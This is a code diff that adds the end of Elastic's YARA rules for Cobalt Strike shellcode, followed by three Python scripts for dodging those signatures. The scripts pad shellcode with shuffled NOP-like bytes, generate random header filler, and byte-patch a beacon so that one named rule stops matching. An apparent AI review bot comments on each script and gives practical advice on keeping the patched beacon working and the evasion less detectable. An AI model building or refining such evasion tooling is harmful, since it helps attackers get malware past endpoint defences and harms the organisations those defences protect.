     1002 + reference_sample = "9fe43996a5c4e99aff6e2a1be743fedec35e96d1e6670579beb4f7e7ad591af9"
     1003 + severity = 100
     1004 + arch_context = "x86"
     1005 + scan_context = "file, memory"
     1006 + license = "Elastic License v2"
     1007 + os = "windows"
     1008 + strings:
     1009 + $a = { 40 55 53 56 57 41 54 41 55 41 56 41 57 48 8D 6C 24 D8 48 81 EC 28 01 00 00 45 33 F6 48 8B D9 48 }
     1010 + condition:
     1011 + all of them
     1012 +}
     1013 + 
     1014 +rule Windows_Trojan_CobaltStrike_1787eef5 {
     1015 + meta:
     1016 + author = "Elastic Security"
     1017 + id = "1787eef5-ff00-4e19-bd22-c5dfc9488c7b"
     1018 + fingerprint = "292f15bdc978fc29670126f1bdc72ade1e7faaf1948653f70b6789a82dbee67f"
     1019 + creation_date = "2022-08-29"
     1020 + last_modified = "2022-09-29"
     1021 + description = "CS shellcode variants"
     1022 + threat_name = "Windows.Trojan.CobaltStrike"
     1023 + reference_sample = "36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a"
     1024 + severity = 100
     1025 + arch_context = "x86"
     1026 + scan_context = "file, memory"
     1027 + license = "Elastic License v2"
     1028 + os = "windows"
     1029 + strings:
     1030 + $a1 = { 55 89 E5 83 EC ?? A1 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 31 C0 C9 C3 55 }
     1031 + $a2 = { 55 89 E5 83 EC ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 31 C0 C9 C3 55 89 E5 83 EC ?? 83 7D ?? ?? }
     1032 + $a3 = { 55 89 E5 8B 45 ?? 5D FF E0 55 8B 15 ?? ?? ?? ?? 89 E5 8B 45 ?? 85 D2 7E ?? 83 3D ?? ?? ?? ?? ?? }
     1033 + $a4 = { 55 89 E5 8B 45 ?? 5D FF E0 55 89 E5 83 EC ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? 85 D2 7E ?? 83 3D ?? ?? ?? ?? ?? }
     1034 + $a5 = { 4D 5A 41 52 55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 8D 1D ?? ?? ?? ?? 48 89 DF 48 81 C3 ?? ?? ?? ?? }
     1035 + condition:
     1036 + 1 of ($a*)
     1037 +}
     1038 + 
     1039 + 
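--- a/prepend.py
+++ b/prepend.py
@@ -0,0 +1,29 @@
+import random
+
+# Define the byte strings to shuffle
+byte_strings = ["40", "41", "42", "6690", "40", "43", "44", "45", "46", "47", "48", "49", "4c", "90", "0f1f00", "660f1f0400", "0f1f0400", "0f1f00", "0f1f00", "87db", "87c9", "87d2", "6687db", "6687c9", "6687d2"]
+
+# Shuffle the byte strings
+random.shuffle(byte_strings)
+
+# Create a new list to store the formatted bytes
+formatted_bytes = []
+
+# Loop through each byte string in the shuffled list
+for byte_string in byte_strings:
+ # Check if the byte string has more than 2 characters
+ if len(byte_string) > 2:
+ # Split the byte string into chunks of two characters
+ byte_list = [byte_string[i:i+2] for i in range(0, len(byte_string), 2)]
+ # Add \x prefix to each byte and join them
+ formatted_bytes.append(''.join([f'\\x{byte}' for byte in byte_list]))
+ else:
+ # Add \x prefix to the single byte
+ formatted_bytes.append(f'\\x{byte_string}')
+
+# Join the formatted bytes into a single string
+formatted_string = ''.join(formatted_bytes)
+
+# Print the formatted byte string
+print(formatted_string)
+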
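Review bot: The `if len(byte_string) > 2` branch on line 15 duplicates the `else` branch — the chunking path already yields the same `\x..` form for a two-character string — so the whole loop can be one comprehension: `formatted_bytes = [''.join(f'\\x{s[i:i+2]}' for i in range(0, len(s), 2)) for s in byte_strings]`. A more important caveat if, as the filename suggests, this output is meant to be prepended to shellcode: the single bytes `40`–`49` and `4c` are standalone instructions only in 32-bit code, and even there `44`/`4c` are `inc esp`/`dec esp`, which skews the stack; in 64-bit code they are REX prefixes, so after a shuffle one of them can land directly before `90` (giving `xchg eax, r8d` for `41 90`) or before whatever follows the prepend and change its meaning. Consider dropping the REX-range entries, or keeping each one glued to a following instruction it is harmless to prefix, and noting in a comment which mode the table targets.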
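--- a/rich_header.py
+++ b/rich_header.py
@@ -0,0 +1,15 @@
+#rich header
+
+import random
+
+def generate_junk_assembly(length):
+ return ''.join([chr(random.randint(0, 255)) for _ in range(length)])
+
+def generate_rich_header(length):
+ rich_header = generate_junk_assembly(length)
+ rich_header_hex = ''.join([f"\\x{ord(c):02x}" for c in rich_header])
+ return rich_header_hex
+
+#generate a number of assembly opcodes (4-byte aligned)
+print(generate_rich_header(random.randint(5,20) * 4))
+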
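Review bot: The comment on line 13 describes the output as "assembly opcodes", but `generate_junk_assembly` returns uniformly random bytes, which in general do not decode to valid instructions — if the value is used as an executable prefix that matters, and if it only needs to be opaque filler the comment should say `# random filler bytes, 4-byte aligned; not executable code`. The `chr`/`ord` round trip through `str` is unnecessary: `data = bytes(random.getrandbits(8) for _ in range(length))` followed by `''.join(f"\\x{b:02x}" for b in data)` produces the same string directly. Also worth a comment: a genuine Rich header has a fixed layout (`DanS` marker, XOR key, `Rich` terminator), so random bytes will not imitate one, and an unparsable header may itself stand out to tooling that inspects it.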
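--- a/rule_f0b627fc_bypass.py
+++ b/rule_f0b627fc_bypass.py
@@ -0,0 +1,33 @@
+import sys
+
+def replace_bytes(input_filename, output_filename):
+ search_bytes = b"\x25\xff\xff\xff\x00\x3d\x41\x41\x41\x00"
+ replacement_bytes = b"\xb8\x41\x41\x41\x00\x3D\x41\x41\x41\x00"
+
+ with open(input_filename, "rb") as input_file:
+ content = input_file.read()
+ modified_content = content.replace(search_bytes, replacement_bytes)
+
+ with open(output_filename, "wb") as output_file:
+ output_file.write(modified_content)
+
+ print(f"Replacement complete. Modified content saved to {output_filename}.")
+
+if len(sys.argv) == 2:
+ input_filename = sys.argv[1]
+ output_filename = "output.bin"
+ replace_bytes(input_filename, output_filename)
+else:
+ print("No arguments provided")
+
+#find
+#25 FF FF FF 00 3D 41 41 41 00
+#and eax,0xffffff
+#cmp eax,0x414141
+
+#replace to
+#b8 41 41 41 00 3d 41 41 41 00
+#mov eax,0x414141
+#cmp eax,0x414141
+
+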
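Review bot: The substitution is not semantically neutral, although the comments on lines 23–31 present it as a drop-in: `mov eax, 0x414141` followed by `cmp eax, 0x414141` always sets ZF, so the `jne` that comes next (the trailing `75` in rule f0b627fc's pattern) is never taken, whereas the original `and eax, 0xffffff` compared whatever eax held — unless the reflective loader guarantees that value at that point, control flow changes and the patched beacon needs to be confirmed to still run. The script also gives no signal when the pattern is absent, because `bytes.replace` silently returns the input unchanged; count first and report it: `hits = content.count(search_bytes)` and `print(f"{hits} occurrence(s) patched")`, exiting non-zero when `hits == 0`. An `assert len(search_bytes) == len(replacement_bytes)` guard would also keep future edits to the two constants from shifting every offset after the patch point.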